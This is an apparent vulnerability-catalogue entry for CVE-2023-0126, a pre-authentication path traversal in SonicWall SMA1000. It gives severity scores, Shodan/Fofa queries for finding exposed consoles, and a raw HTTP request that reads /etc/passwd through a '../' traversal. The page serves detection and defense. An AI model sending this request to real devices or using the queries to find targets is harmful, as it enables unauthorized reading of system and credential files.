🔙 목록으로 돌아가기

CVE-2023-0126: SonicWall SMA1000 LFI

TitleSonicWall SMA1000 LFI
Authortess
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.
RemediationApply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.93047
CVE IDCVE-2023-0126
CWE IDCWE-22
Shodan Querytitle:"Appliance Management Console Login"
Fofa Querytitle="appliance management console login"
Tags cve2023 cve sonicwall lfi sma1000 vuln

🔍 Vulnerability Description

Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.

🌐 HTTP Request

GET /images//////////////////../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0126.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0126.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A